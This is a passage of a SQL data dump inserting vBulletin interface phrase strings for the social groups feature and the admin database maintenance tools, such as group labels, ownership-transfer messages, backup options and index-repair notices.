(37397, -1, 'following_urls_invalid_picture_not_found', 'socialgroups', 'The following URLs were invalid. The specified picture could not be found or did not come from your albums .', 'vbulletin', 'vBulletin Solutions', 1195493961, '3.7.0 Beta 1'),
(37398, -1, 'from_x', 'socialgroups', 'From {3} ', 'vbulletin', 'vBulletin Solutions', 1196493906, '3.7.0 Beta 1'),
(37399, -1, 'group_created', 'socialgroups', 'Created', 'vbulletin', 'vBulletin Solutions', 1192454348, '3.7.0 Beta 1'),
(37400, -1, 'group_created_by', 'socialgroups', 'Group Created By', 'vbulletin', 'vBulletin Solutions', 1224674639, '3.8.0 Beta 2'),
(37401, -1, 'group_desc_inviteonly', 'socialgroups', 'This is an invite only group.', 'vbulletin', 'vBulletin Solutions', 1196948658, '3.7.0 Beta 1'),
(37402, -1, 'group_desc_moderated', 'socialgroups', 'This is a moderated group.', 'vbulletin', 'vBulletin Solutions', 1196948641, '3.7.0 Beta 1'),
(37403, -1, 'group_desc_public', 'socialgroups', 'This is a public group.', 'vbulletin', 'vBulletin Solutions', 1196948629, '3.7.0 Beta 1'),
(37404, -1, 'group_description', 'socialgroups', 'Group Description', 'vbulletin', 'vBulletin Solutions', 1192530673, '3.7.0 Beta 1'),
(37405, -1, 'group_does_not_exist', 'socialgroups', 'That group does not exist', 'vbulletin', 'vBulletin Solutions', 1192527384, '3.7.0 Beta 1'),
(37406, -1, 'group_has_no_discussions', 'socialgroups', 'This group does not have any discussions yet.', 'vbulletin', 'vBulletin Solutions', 1214228608, '3.7.1'),
(37407, -1, 'group_icon_desc', 'socialgroups', 'Social group icons are small pictures representing a social group, which are displayed when viewing a social group or as a smaller version when browsing group listings. Note: Your group will not show up in New Groups or Random Group on the group overview page unless you have uploaded an icon.', 'vbulletin', 'vBulletin Solutions', 1226322332, '3.8.0 Beta 2'),
(37408, -1, 'group_icon_file_path_dfn', 'socialgroups', 'Social Group Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) ', 'vbulletin', 'vBulletin Solutions', 1216899713, '3.8.0 Alpha 1'),
(37409, -1, 'group_icons_are_currently_being_served_from_the_database', 'socialgroups', 'Social Group Icons are currently being served from the database', 'vbulletin', 'vBulletin Solutions', 1216899904, '3.8.0 Alpha 1'),
(37410, -1, 'group_icons_are_currently_being_served_from_the_filesystem_at_x', 'socialgroups', 'Social group icons are currently being served from the filesystem at {1}', 'vbulletin', 'vBulletin Solutions', 1216899483, '3.8.0 Alpha 1'),
(37411, -1, 'group_maintained_by', 'socialgroups', 'Group Maintained By', 'vbulletin', 'vBulletin Solutions', 1221135533, '3.8.0 Alpha 1'),
(37412, -1, 'group_maintained_by_x', 'socialgroups', 'Group Maintained by {2} ', 'vbulletin', 'vBulletin Solutions', 1221140437, '3.8.0 Alpha 1'),
(37413, -1, 'group_options', 'socialgroups', 'Group Options', 'vbulletin', 'vBulletin Solutions', 1204716911, '3.7.0 Beta 6'),
(37414, -1, 'group_ownership_transfer_request_sent_to_x', 'socialgroups', 'A request to transfer the ownership of this social group to {2} is in progress. If you would like to transfer the group to another user you must first cancel this transfer request. Would you like to do this now?', 'vbulletin', 'vBulletin Solutions', 1228128905, '3.8.0 Release Candidate 1'),
(37415, -1, 'group_pictures', 'socialgroups', 'Group Pictures', 'vbulletin', 'vBulletin Solutions', 1195494143, '3.7.0 Beta 1'),
(37416, -1, 'group_subscriptions', 'socialgroups', 'Group Subscriptions', 'vbulletin', 'vBulletin Solutions', 1234874310, '3.8.2'),
(37417, -1, 'group_tools', 'socialgroups', 'Group Tools', 'vbulletin', 'vBulletin Solutions', 1213619855, '3.7.1'),
(37418, -1, 'group_type', 'socialgroups', 'Group Type', 'vbulletin', 'vBulletin Solutions', 1196175197, '3.7.0 Beta 1'),
(37419, -1, 'group_type_inviteonly', 'socialgroups', 'Invite Only', 'vbulletin', 'vBulletin Solutions', 1196175297, '3.7.0 Beta 1'),
(37420, -1, 'group_type_moderated', 'socialgroups', 'Moderated', 'vbulletin', 'vBulletin Solutions', 1196175267, '3.7.0 Beta 1'),
(37421, -1, 'group_type_public', 'socialgroups', 'Public', 'vbulletin', 'vBulletin Solutions', 1196175227, '3.7.0 Beta 1'),
(37422, -1, 'groups_you_created', 'socialgroups', 'Groups You Created', 'vbulletin', 'vBulletin Solutions', 1218210630, '3.8.0 Alpha 1'),
(37423, -1, 'in_category_x', 'socialgroups', 'in category {1} ', 'vbulletin', 'vBulletin Solutions', 1217935252, '3.8.0 Alpha 1'),
(37424, -1, 'invalid_username', 'socialgroups', 'The user you have specified was not found.', 'vbulletin', 'vBulletin Solutions', 1200321960, '3.7.0 Beta 4'),
(37425, -1, 'invite', 'socialgroups', 'Invite', 'vbulletin', 'vBulletin Solutions', 1196252637, '3.7.0 Beta 1'),
(37426, -1, 'invite_user', 'socialgroups', 'Invite User', 'vbulletin', 'vBulletin Solutions', 1196252610, '3.7.0 Beta 1'),
(37427, -1, 'invited_users', 'socialgroups', 'Invited Users', 'vbulletin', 'vBulletin Solutions', 1196252513, '3.7.0 Beta 1'),
(37428, -1, 'invited_users_description', 'socialgroups', 'The following users have been invited to this group', 'vbulletin', 'vBulletin Solutions', 1196939310, '3.7.0 Beta 1'),
(37429, -1, 'is_in_category', 'socialgroups', 'Is in Category', 'vbulletin', 'vBulletin Solutions', 1215787498, '3.8.0 Alpha 1'),
(37430, -1, 'join_group', 'socialgroups', 'Join Group', 'vbulletin', 'vBulletin Solutions', 1192527075, '3.7.0 Beta 1'),
(37431, -1, 'join_group_question', 'socialgroups', 'Join Group?', 'vbulletin', 'vBulletin Solutions', 1195748203, '3.7.0 Beta 1'),
(37432, -1, 'join_moderated_extratext', 'socialgroups', 'Please Note: This is a moderated group, your membership will need to be approved. ', 'vbulletin', 'vBulletin Solutions', 1196960256, '3.7.0 Beta 1'),
(37433, -1, 'joined_group', 'socialgroups', 'Joined', 'vbulletin', 'vBulletin Solutions', 1192456676, '3.7.0 Beta 1'),
(37434, -1, 'kick_members', 'socialgroups', 'Remove Members', 'vbulletin', 'vBulletin Solutions', 1196956652, '3.7.0 Beta 1'),
(37435, -1, 'kick_members_description', 'socialgroups', 'The following users are members of this group', 'vbulletin', 'vBulletin Solutions', 1196939438, '3.7.0 Beta 1'),
(37436, -1, 'last_member_of_group', 'socialgroups', 'The only member left in this group is the owner. The owner cannot be removed from a group.', 'vbulletin', 'vBulletin Solutions', 1196956613, '3.7.0 Beta 1'),
(37437, -1, 'last_updated', 'socialgroups', 'Last Updated', 'vbulletin', 'vBulletin Solutions', 1217858584, '3.8.0 Alpha 1'),
(37438, -1, 'leave_group_question', 'socialgroups', 'Leave Group?', 'vbulletin', 'vBulletin Solutions', 1195748214, '3.7.0 Beta 1'),
(37439, -1, 'leave_social_group', 'socialgroups', 'Leave Group', 'vbulletin', 'vBulletin Solutions', 1207563063, '3.7.0 Release Candidate 3'),
(37440, -1, 'manage_members', 'socialgroups', 'Manage Members', 'vbulletin', 'vBulletin Solutions', 1196252361, '3.7.0 Beta 1'),
(37441, -1, 'may_add_pictures_group_paste_url', 'socialgroups', 'You may add pictures to this group from your albums . Paste the URL of each picture you want to add on a separate line. Alternatively, you can add pictures to this group by first viewing them in your albums and then selecting \"Add Pictures to Group\".', 'vbulletin', 'vBulletin Solutions', 1196464970, '3.7.0 Beta 1'),
(37442, -1, 'member_list', 'socialgroups', 'Member List', 'vbulletin', 'vBulletin Solutions', 1192555221, '3.7.0 Beta 1'),
(37443, -1, 'member_management', 'socialgroups', 'Member Management', 'vbulletin', 'vBulletin Solutions', 1196252476, '3.7.0 Beta 1'),
(37444, -1, 'members_greater_than', 'socialgroups', 'Members Greater Than', 'vbulletin', 'vBulletin Solutions', 1200321974, '3.7.0 Beta 4'),
(37445, -1, 'members_in_group_x', 'socialgroups', 'Members in Social Group {1} ', 'vbulletin', 'vBulletin Solutions', 1194887147, '3.7.0 Beta 1'),
(37446, -1, 'members_less_than', 'socialgroups', 'Members Less Than', 'vbulletin', 'vBulletin Solutions', 1200321987, '3.7.0 Beta 4'),
(37447, -1, 'members_pending_moderation', 'socialgroups', 'Members Pending Moderation', 'vbulletin', 'vBulletin Solutions', 1196252547, '3.7.0 Beta 1'),
(37448, -1, 'members_pending_moderation_description', 'socialgroups', 'The following users want to join this group', 'vbulletin', 'vBulletin Solutions', 1196939165, '3.7.0 Beta 1'),
(37449, -1, 'messages_must_be_approved_by_owner', 'socialgroups', 'Messages must be approved by the owner', 'vbulletin', 'vBulletin Solutions', 1204717844, '3.7.0 Beta 6'),
(37450, -1, 'moderated_social_group', 'socialgroups', 'Moderated Social Group', 'vbulletin', 'vBulletin Solutions', 1217858049, '3.8.0 Alpha 1'),
(37451, -1, 'move_group_icons_from_database_into_filesystem', 'socialgroups', 'Move Social Group Icons from Database into File System', 'vbulletin', 'vBulletin Solutions', 1216899845, '3.8.0 Alpha 1'),
(37452, -1, 'move_group_icons_from_filesystem_into_database', 'socialgroups', 'Move group icons from the filesystem into the database', 'vbulletin', 'vBulletin Solutions', 1216899597, '3.8.0 Alpha 1'),
(37453, -1, 'move_group_icons_to_a_different_directory', 'socialgroups', 'Move group icons to a different directory', 'vbulletin', 'vBulletin Solutions', 1216899636, '3.8.0 Alpha 1'),
(37454, -1, 'must_join_to_view', 'socialgroups', 'You need to be a member of this group to view its contents', 'vbulletin', 'vBulletin Solutions', 1204936512, '3.7.0 Release Candidate 1'),
(37455, -1, 'new_discussion', 'socialgroups', 'Post New Discussion', 'vbulletin', 'vBulletin Solutions', 1212080549, '3.7.1'),
(37456, -1, 'new_groups', 'socialgroups', 'New Groups', 'vbulletin', 'vBulletin Solutions', 1218210923, '3.8.0 Alpha 1'),
(37457, -1, 'no_discussions_found', 'socialgroups', 'No discussions were found. Try different search terms.', 'vbulletin', 'vBulletin Solutions', 1214389652, '3.7.1'),
(37458, -1, 'no_group_icon', 'socialgroups', 'No Social Group Icon Specified', 'vbulletin', 'vBulletin Solutions', 1216132966, '3.8.0 Alpha 1'),
(37459, -1, 'no_groups_found', 'socialgroups', 'No Groups were Found', 'vbulletin', 'vBulletin Solutions', 1200322007, '3.7.0 Beta 4'),
(37460, -1, 'no_groups_selected_or_invalid_input', 'socialgroups', 'No groups selected, or you have provided invalid input.', 'vbulletin', 'vBulletin Solutions', 1200322028, '3.7.0 Beta 4'),
(37461, -1, 'no_groups_to_display', 'socialgroups', 'No Groups to Display', 'vbulletin', 'vBulletin Solutions', 1192453568, '3.7.0 Beta 1'),
(37462, -1, 'no_pictures_added_group_yet', 'socialgroups', 'No pictures have been added to this group yet.', 'vbulletin', 'vBulletin Solutions', 1195494167, '3.7.0 Beta 1'),
(37463, -1, 'no_results', 'socialgroups', 'No results found.', 'vbulletin', 'vBulletin Solutions', 1219746352, '3.8.0 Alpha 1'),
(37464, -1, 'no_social_groups', 'socialgroups', 'There are no social groups.', 'vbulletin', 'vBulletin Solutions', 1223646809, '3.8.0 Beta 1'),
(37465, -1, 'not_group_owner', 'socialgroups', 'You are not the group owner', 'vbulletin', 'vBulletin Solutions', 1192533807, '3.7.0 Beta 1'),
(37466, -1, 'not_in_group', 'socialgroups', 'You are not a member of that group!', 'vbulletin', 'vBulletin Solutions', 1192463639, '3.7.0 Beta 1'),
(37467, -1, 'number_of_groups_to_process_per_cycle', 'socialgroups', 'Number of Groups to process per cycle', 'vbulletin', 'vBulletin Solutions', 1216900926, '3.8.0 Alpha 1'),
(37468, -1, 'one_url_per_line_paren', 'socialgroups', '(One URL per line)', 'vbulletin', 'vBulletin Solutions', 1195493666, '3.7.0 Beta 1'),
(37469, -1, 'only_owner_can_create_discussions', 'socialgroups', 'Only the group owner can create new discussions', 'vbulletin', 'vBulletin Solutions', 1210937101, '3.7.1'),
(37470, -1, 'only_owner_can_create_new_discussions', 'socialgroups', 'Only owner can create new discussions', 'vbulletin', 'vBulletin Solutions', 1214230220, '3.7.1'),
(37471, -1, 'pending_and_invited_members', 'socialgroups', 'Pending & Invited Members', 'vbulletin', 'vBulletin Solutions', 1196949297, '3.7.0 Beta 1'),
(37472, -1, 'pending_members', 'socialgroups', 'Pending Members', 'vbulletin', 'vBulletin Solutions', 1217605874, '3.8.0 Alpha 1'),
(37473, -1, 'physically_remove_discussion', 'socialgroups', 'Physically Remove Discussion', 'vbulletin', 'vBulletin Solutions', 1214231885, '3.7.1'),
(37474, -1, 'picture_urls', 'socialgroups', 'Picture URLs', 'vbulletin', 'vBulletin Solutions', 1195493643, '3.7.0 Beta 1'),
(37475, -1, 'picture_x_of_y_from_group_z', 'socialgroups', 'Picture {1} of {2} from Group {3} ', 'vbulletin', 'vBulletin Solutions', 1195559187, '3.7.0 Beta 1'),
(37476, -1, 'pictures_from_group_x', 'socialgroups', 'Pictures from Group {1} ', 'vbulletin', 'vBulletin Solutions', 1195559315, '3.7.0 Beta 1'),
(37477, -1, 'pm_request_to_take_ownership_of_social_group_accepted_message', 'socialgroups', 'The user {1} has accepted a request to take ownership of the Social Group [url={2}/group.php?groupid={3}]{4}[/url].', 'vbulletin', 'vBulletin Solutions', 1221140016, '3.8.0 Alpha 1'),
(37478, -1, 'pm_request_to_take_ownership_of_social_group_accepted_title', 'socialgroups', 'Request to Take Ownership of Social Group {1} Accepted', 'vbulletin', 'vBulletin Solutions', 1221139743, '3.8.0 Alpha 1'),
(37479, -1, 'pm_request_to_take_ownership_of_social_group_message', 'socialgroups', 'A request has been made for you to take ownership of the Social Group [url={1}/group.php?groupid={2}]{3}[/url].\r\n\r\n[url={1}/group.php?groupid={2}&do=accepttransfer]Click here to accept or reject this request[/url].', 'vbulletin', 'vBulletin Solutions', 1221137582, '3.8.0 Alpha 1'),
(37480, -1, 'pm_request_to_take_ownership_of_social_group_title', 'socialgroups', 'Request to Take Ownership of Social Group {1}', 'vbulletin', 'vBulletin Solutions', 1221133040, '3.8.0 Alpha 1'),
(37481, -1, 'post_new_discussion', 'socialgroups', 'Post New Discussion', 'vbulletin', 'vBulletin Solutions', 1221755097, '3.8.0 Alpha 1'),
(37482, -1, 'prune_social_groups', 'socialgroups', 'Prune Social Groups', 'vbulletin', 'vBulletin Solutions', 1200322087, '3.7.0 Beta 4'),
(37483, -1, 'random_group', 'socialgroups', 'Random Group', 'vbulletin', 'vBulletin Solutions', 1218104874, '3.8.0 Alpha 1'),
(37484, -1, 'remove_from_group', 'socialgroups', 'Remove from group', 'vbulletin', 'vBulletin Solutions', 1195559224, '3.7.0 Beta 1'),
(37485, -1, 'remove_picture_from_group', 'socialgroups', 'Remove Picture from Group', 'vbulletin', 'vBulletin Solutions', 1195493784, '3.7.0 Beta 1'),
(37486, -1, 'reply_to_discussion', 'socialgroups', 'Reply to Discussion', 'vbulletin', 'vBulletin Solutions', 1232113427, '3.8.1'),
(37487, -1, 'report_group_message', 'socialgroups', 'Report Social Group Message', 'vbulletin', 'vBulletin Solutions', 1195594737, '3.7.0 Beta 1'),
(37488, -1, 'request_transfer', 'socialgroups', 'Request Transfer', 'vbulletin', 'vBulletin Solutions', 1220974925, '3.8.0 Alpha 1'),
(37489, -1, 'search_discussions', 'socialgroups', 'Search Discussions', 'vbulletin', 'vBulletin Solutions', 1214387137, '3.7.1'),
(37490, -1, 'search_groups', 'socialgroups', 'Search Groups', 'vbulletin', 'vBulletin Solutions', 1193143047, '3.7.0 Beta 1'),
(37491, -1, 'search_social_groups', 'socialgroups', 'Search Social Groups', 'vbulletin', 'vBulletin Solutions', 1200322106, '3.7.0 Beta 4'),
(37492, -1, 'select_a_category', 'socialgroups', 'Select a Category', 'vbulletin', 'vBulletin Solutions', 1215698028, '3.8.0 Alpha 1'),
(37493, -1, 'select_destination_category', 'socialgroups', 'Select Destination Category', 'vbulletin', 'vBulletin Solutions', 1215686626, '3.8.0 Alpha 1'),
(37494, -1, 'selected_discussions', 'socialgroups', 'Selected Discussions', 'vbulletin', 'vBulletin Solutions', 1214299802, '3.7.1'),
(37495, -1, 'selected_groups', 'socialgroups', 'Selected Groups', 'vbulletin', 'vBulletin Solutions', 1234873010, '3.8.2'),
(37496, -1, 'showing_discussions_x_of_y', 'socialgroups', 'Showing Discussions {1} of {2}', 'vbulletin', 'vBulletin Solutions', 1210938694, '3.7.1'),
(37497, -1, 'showing_discussions_x_to_y_of_z', 'socialgroups', 'Showing Discussions {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1210938653, '3.7.1'),
(37498, -1, 'showing_gms_x_to_y_of_z', 'socialgroups', 'Showing Social Group Messages {1} to {2} of {3} ', 'vbulletin', 'vBulletin Solutions', 1196339431, '3.7.0 Beta 1'),
(37499, -1, 'showing_x_of_y_members', 'socialgroups', 'Showing {1} of {2} Member(s)', 'vbulletin', 'vBulletin Solutions', 1205922396, '3.7.0 Release Candidate 1'),
(37500, -1, 'showing_x_of_y_pictures', 'socialgroups', 'Showing {1} of {2} Picture(s)', 'vbulletin', 'vBulletin Solutions', 1205922409, '3.7.0 Release Candidate 1'),
(37501, -1, 'skip', 'socialgroups', 'Skip', 'vbulletin', 'vBulletin Solutions', 1227095793, '3.8.0 Beta 3'),
(37502, -1, 'social_group', 'socialgroups', 'Social Group', 'vbulletin', 'vBulletin Solutions', 1193231324, '3.7.0 Beta 1'),
(37503, -1, 'social_group_categories', 'socialgroups', 'Social Group Categories', 'vbulletin', 'vBulletin Solutions', 1215686687, '3.8.0 Alpha 1'),
(37504, -1, 'social_group_category', 'socialgroups', 'Social Group Category', 'vbulletin', 'vBulletin Solutions', 1215698315, '3.8.0 Alpha 1'),
(37505, -1, 'social_group_discussion', 'socialgroups', 'Social Group Discussion', 'vbulletin', 'vBulletin Solutions', 1210938391, '3.7.1'),
(37506, -1, 'social_group_discussions_in_x', 'socialgroups', 'Social Group Discussions in: {1} ', 'vbulletin', 'vBulletin Solutions', 1214223225, '3.7.1'),
(37507, -1, 'social_group_icon', 'socialgroups', 'Social Group Icon', 'vbulletin', 'vBulletin Solutions', 1216899326, '3.8.0 Alpha 1'),
(37508, -1, 'social_group_icons', 'socialgroups', 'Social Group Icons', 'vbulletin', 'vBulletin Solutions', 1216900222, '3.8.0 Alpha 1'),
(37509, -1, 'social_group_icons_manager', 'socialgroups', 'Social Group Icons Manager', 'vbulletin', 'vBulletin Solutions', 1216900355, '3.8.0 Alpha 1'),
(37510, -1, 'social_groups', 'socialgroups', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1192453974, '3.7.0 Beta 1'),
(37511, -1, 'subscribe_to_this_discussion', 'socialgroups', 'Subscribe to This Discussion', 'vbulletin', 'vBulletin Solutions', 1213716885, '3.7.1'),
(37512, -1, 'subscribe_to_this_group', 'socialgroups', 'Subscribe to This Group', 'vbulletin', 'vBulletin Solutions', 1213716860, '3.7.1'),
(37513, -1, 'subscribed_discussions', 'socialgroups', 'Subscribed Discussions', 'vbulletin', 'vBulletin Solutions', 1214240622, '3.7.1'),
(37514, -1, 'successfully_requested_group_transfer', 'socialgroups', 'A transfer request has been sent.', 'vbulletin', 'vBulletin Solutions', 1220980489, '3.8.0 Alpha 1'),
(37515, -1, 'the_following_pictures_added_group_successfully', 'socialgroups', 'The following pictures were added to this group successfully:', 'vbulletin', 'vBulletin Solutions', 1195469992, '3.7.0 Beta 1'),
(37516, -1, 'the_following_pictures_already_part_group', 'socialgroups', 'The following pictures were already part of this group:', 'vbulletin', 'vBulletin Solutions', 1195470006, '3.7.0 Beta 1'),
(37517, -1, 'this_person_is_already_a_member_of_the_group', 'socialgroups', 'This person is already a member of the group', 'vbulletin', 'vBulletin Solutions', 1196947290, '3.7.0 Beta 1'),
(37518, -1, 'this_user_is_not_allowed_to_join_groups', 'socialgroups', 'This user is not allowed to join Social Groups', 'vbulletin', 'vBulletin Solutions', 1196959578, '3.7.0 Beta 1'),
(37519, -1, 'transfer_group', 'socialgroups', 'Transfer Group', 'vbulletin', 'vBulletin Solutions', 1221141475, '3.8.0 Alpha 1'),
(37520, -1, 'transfer_group_ownership', 'socialgroups', 'Transfer Group Ownership', 'vbulletin', 'vBulletin Solutions', 1220974581, '3.8.0 Alpha 1'),
(37521, -1, 'transfer_group_ownership_info', 'socialgroups', 'If you no longer wish to maintain this social group, you may request another user to take ownership of it instead. Enter the name of the user you would like to transfer the ownership of the social group to. \r\nThe user that you request to transfer the group to will receive a private message and an option to confirm the transfer. You may cancel the transfer until the target user has confirmed that they will take over the social group for you.', 'vbulletin', 'vBulletin Solutions', 1220974825, '3.8.0 Alpha 1'),
(37522, -1, 'transfer_to_user', 'socialgroups', 'Transfer to User', 'vbulletin', 'vBulletin Solutions', 1220974739, '3.8.0 Alpha 1'),
(37523, -1, 'unapprove_discussions', 'socialgroups', 'Unapprove Discussions', 'vbulletin', 'vBulletin Solutions', 1212160033, '3.7.1'),
(37524, -1, 'undelete_discussions', 'socialgroups', 'Undelete Discussions', 'vbulletin', 'vBulletin Solutions', 1212159958, '3.7.1'),
(37525, -1, 'unsubscribe_from_this_discussion', 'socialgroups', 'Unsubscribe from this Discussion', 'vbulletin', 'vBulletin Solutions', 1213718363, '3.7.1'),
(37526, -1, 'unsubscribe_from_this_group', 'socialgroups', 'Unsubscribe from this Group', 'vbulletin', 'vBulletin Solutions', 1213718396, '3.7.1'),
(37527, -1, 'url_to_group_icons_relative_to_your_forums_home_page', 'socialgroups', 'URL to Social Group Icons (Relative to your forums home page) ', 'vbulletin', 'vBulletin Solutions', 1216900429, '3.8.0 Alpha 1'),
(37528, -1, 'user_already_owns_group', 'socialgroups', 'User already has ownership of this group', 'vbulletin', 'vBulletin Solutions', 1236771391, '3.8.2'),
(37529, -1, 'user_cannot_own_any_more_social_groups', 'socialgroups', 'User cannot own any more social groups.', 'vbulletin', 'vBulletin Solutions', 1221131730, '3.8.0 Alpha 1'),
(37530, -1, 'user_does_not_exist', 'socialgroups', 'User does not exist', 'vbulletin', 'vBulletin Solutions', 1196252389, '3.7.0 Beta 1'),
(37531, -1, 'user_does_not_have_permission_to_own_social_groups', 'socialgroups', 'User does not have permission to own social groups.', 'vbulletin', 'vBulletin Solutions', 1221130026, '3.8.0 Alpha 1'),
(37532, -1, 'users_must_join_to_view_content', 'socialgroups', 'Users must join to view the content', 'vbulletin', 'vBulletin Solutions', 1204717873, '3.7.0 Beta 6'),
(37533, -1, 'view_all_categories', 'socialgroups', 'View All Categories', 'vbulletin', 'vBulletin Solutions', 1217858777, '3.8.0 Alpha 1'),
(37534, -1, 'view_all_groups', 'socialgroups', 'View All Groups', 'vbulletin', 'vBulletin Solutions', 1217605994, '3.8.0 Alpha 1'),
(37535, -1, 'view_all_members', 'socialgroups', 'View All Members', 'vbulletin', 'vBulletin Solutions', 1193132481, '3.7.0 Beta 1'),
(37536, -1, 'view_next', 'socialgroups', 'View Next', 'vbulletin', 'vBulletin Solutions', 1217858653, '3.8.0 Alpha 1'),
(37537, -1, 'view_previous', 'socialgroups', 'View Previous', 'vbulletin', 'vBulletin Solutions', 1218029723, '3.8.0 Alpha 1'),
(37538, -1, 'we_are_ready_to_attempt_to_move_your_group_icons_from_database_to_filesystem', 'socialgroups', 'We are ready to attempt to move your Social Group Icons from the Database to the Filesystem.
It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', 'vBulletin Solutions', 1216900146, '3.8.0 Alpha 1'),
(37539, -1, 'we_are_ready_to_attempt_to_move_your_group_icons_from_filesystem_to_database', 'socialgroups', 'We are ready to attempt to move your Social Group Icons from the Filesystem to the Database.
It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
', 'vbulletin', 'vBulletin Solutions', 1216900095, '3.8.0 Alpha 1'),
(37540, -1, 'x_awaiting_moderation', 'socialgroups', '{1} awaiting moderation', 'vbulletin', 'vBulletin Solutions', 1200322122, '3.7.0 Beta 4'),
(37541, -1, 'x_groups', 'socialgroups', '{1} groups', 'vbulletin', 'vBulletin Solutions', 1215698267, '3.8.0 Alpha 1'),
(37542, -1, 'x_members', 'socialgroups', '{1} member(s)', 'vbulletin', 'vBulletin Solutions', 1200322137, '3.7.0 Beta 4'),
(37543, -1, 'you_are_not_a_member_of_any_groups', 'socialgroups', 'You are not a member of any groups', 'vbulletin', 'vBulletin Solutions', 1192453832, '3.7.0 Beta 1'),
(37544, -1, 'you_are_not_the_owner', 'socialgroups', 'You are not the Owner of this group', 'vbulletin', 'vBulletin Solutions', 1192529688, '3.7.0 Beta 1'),
(37545, -1, 'you_did_not_select_any_groups', 'socialgroups', 'You did not select any groups.', 'vbulletin', 'vBulletin Solutions', 1200322152, '3.7.0 Beta 4'),
(37546, -1, 'you_have_no_subscribed_discussions', 'socialgroups', 'You have not subscribed to any discussions', 'vbulletin', 'vBulletin Solutions', 1214240525, '3.7.1'),
(37547, -1, 'your_groups', 'socialgroups', 'Your Groups', 'vbulletin', 'vBulletin Solutions', 1218210739, '3.8.0 Alpha 1'),
(37548, -1, 'your_groups_in_need_of_attention', 'socialgroups', 'Your Groups In Need Of Attention', 'vbulletin', 'vBulletin Solutions', 1199912044, '3.7.0 Beta 4'),
(37549, -1, 'your_groups_with_moderated_messages', 'socialgroups', 'Your Groups with Moderated Messages', 'vbulletin', 'vBulletin Solutions', 1219746270, '3.8.0 Alpha 1'),
(37550, -1, 'your_invites', 'socialgroups', 'Your Invites', 'vbulletin', 'vBulletin Solutions', 1199911978, '3.7.0 Beta 4'),
(37551, -1, 'add_column_names', 'sql', 'Add Column Names', 'vbulletin', '', 0, ''),
(37552, -1, 'affected_rows', 'sql', 'Affected Rows: {1} ({2}s)', 'vbulletin', '', 0, ''),
(37553, -1, 'all_unique_indexes_checked', 'sql', 'All unique indexes checked and corrected as necessary. Click the Proceed button to return to the main repair page.', 'vbulletin', '', 0, ''),
(37554, -1, 'allow_vcard_download', 'sql', 'Allow vCard Download', 'vbulletin', '', 0, ''),
(37555, -1, 'an_error_occured_while_attempting_to_run_your_query', 'sql', 'An error occurred while attempting to execute your query. The following information was returned.\r\n error number: {1}\r\n error desc: {2}', 'vbulletin', '', 0, ''),
(37556, -1, 'auto_query', 'sql', 'Automatic QueryHelpful, predefined queries for mass updating the settings of users and posts. Once a query is executed it can not be reversed. ', 'vbulletin', '', 0, ''),
(37557, -1, 'backup_database_to_a_file_on_the_server', 'sql', 'Backup database to a file on the server', 'vbulletin', '', 0, ''),
(37558, -1, 'backup_file_warning', 'sql', 'Warning : The file path specified here will save the backup within the web root, meaning that anybody can download it. We recommend that you specify a more secure location to store your backup.', 'vbulletin', '', 0, ''),
(37559, -1, 'confirm_query_execution', 'sql', 'Confirm Query Execution', 'vbulletin', '', 0, ''),
(37560, -1, 'convert_tables_from_x_to_y', 'sql', 'Convert Tables From {1} to {2}', 'vbulletin', '', 0, ''),
(37561, -1, 'convert_x_from_y_to_z', 'sql', 'Convert {1} From {2} to {3}', 'vbulletin', '', 0, ''),
(37562, -1, 'creating_unique_index', 'sql', 'Creating unique index...', 'vbulletin', '', 0, ''),
(37563, -1, 'csv_backup_of_single_database_table', 'sql', 'CSV backup of single database table', 'vbulletin', '', 0, ''),
(37564, -1, 'data_length', 'sql', 'Data Length', 'vbulletin', '', 0, ''),
(37565, -1, 'database_table_to_include_in_backup', 'sql', 'Database tables to include in backup', 'vbulletin', '', 0, ''),
(37566, -1, 'deleted_duplicate_occurence', 'sql', 'Deleted duplicate occurrence', 'vbulletin', '', 0, ''),
(37567, -1, 'display_avatars', 'sql', 'Display Avatars', 'vbulletin', '', 0, ''),
(37568, -1, 'display_email', 'sql', 'Display Email', 'vbulletin', '', 0, ''),
(37569, -1, 'display_images', 'sql', 'Display Images', 'vbulletin', '', 0, ''),
(37570, -1, 'display_reputation', 'sql', 'Display Reputation', 'vbulletin', '', 0, ''),
(37571, -1, 'display_signatures', 'sql', 'Display Signatures', 'vbulletin', '', 0, ''),
(37572, -1, 'dropping_non_unique_index', 'sql', 'Dropping non-unique index...', 'vbulletin', '', 0, ''),
(37573, -1, 'execute_sql_query', 'sql', 'Execute SQL Query', 'vbulletin', '', 0, ''),
(37574, -1, 'fix_unique_indexes', 'sql', 'Fix Unique Indexes', 'vbulletin', '', 0, ''),
(37575, -1, 'fix_unique_indexes_intro', 'sql', ' If for whatever reason the UNIQUE indexes in your database\r\n have been lost (usually this happens after importing an\r\n incomplete or corrupt SQL dump) you may find strange behavior,\r\n particularly when using the language and template systems. \r\n \r\n This system will attempt to correct the problem and rebuild your\r\n UNIQUE indexes. \r\n \r\n Please ensure that the mysql-schema.php file is present\r\n in the install folder on your web server before continuing.', 'vbulletin', '', 0, ''),
(37576, -1, 'found_x_duplicate_record_occurences', 'sql', 'Found {1} duplicate record occurrences', 'vbulletin', '', 0, ''),
(37577, -1, 'index_length', 'sql', 'Index Length', 'vbulletin', '', 0, ''),
(37578, -1, 'invisible_mode', 'sql', 'Invisible Mode', 'vbulletin', '', 0, ''),
(37579, -1, 'isam_tables', 'sql', 'ISAM Tables', 'vbulletin', '', 0, ''),
(37580, -1, 'manual_query', 'sql', 'Manual QueryOnly one query can be run at a time. Once a query is executed it can not be reversed ', 'vbulletin', '', 0, ''),
(37581, -1, 'newest_first', 'sql', 'Newest First', 'vbulletin', '', 0, ''),
(37582, -1, 'oldest_first', 'sql', 'Oldest First', 'vbulletin', '', 0, ''),
(37583, -1, 'optimize_tables', 'sql', 'Optimize Tables', 'vbulletin', '', 0, ''),
(37584, -1, 'overhead', 'sql', 'Overhead', 'vbulletin', '', 0, ''),
(37585, -1, 'path_and_file_to_save_backup_to', 'sql', 'Path and name of file to save backup to:Your web server must have access to write to this directory (usually chmod 0777) ', 'vbulletin', '', 0, ''),
